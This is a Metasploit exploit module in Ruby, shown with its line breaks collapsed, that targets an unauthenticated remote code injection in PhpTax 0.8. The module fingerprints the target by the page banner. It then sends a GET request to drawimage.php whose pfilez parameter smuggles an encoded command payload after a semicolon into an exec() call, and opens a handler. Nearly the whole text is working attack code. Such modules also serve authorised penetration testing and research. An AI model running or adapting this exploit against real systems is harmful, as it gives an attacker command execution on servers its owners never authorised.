## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "PhpTax pfilez Parameter Exec Remote Code Injection", 'Description' => %q{ This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in an exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jean Pascal Pereira ', 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '86992'], ['EDB', '21665'] ], 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby telnet python' } }, 'Platform' => %w{ linux unix }, 'Targets' => [ ['PhpTax 0.8', {}] ], 'Arch' => ARCH_CMD, 'Privileged' => false, 'DisclosureDate' => "Oct 8 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/']) ]) end def check uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' res = send_request_raw({'uri'=>uri}) if res and res.body =~ /PHPTAX by William L\. Berggren/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path print_status("#{rhost}#{rport} - Sending request...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "drawimage.php"), 'vars_get' => { 'pdf' => 'make', 'pfilez' => "xxx; #{payload.encoded}" } }) handler end end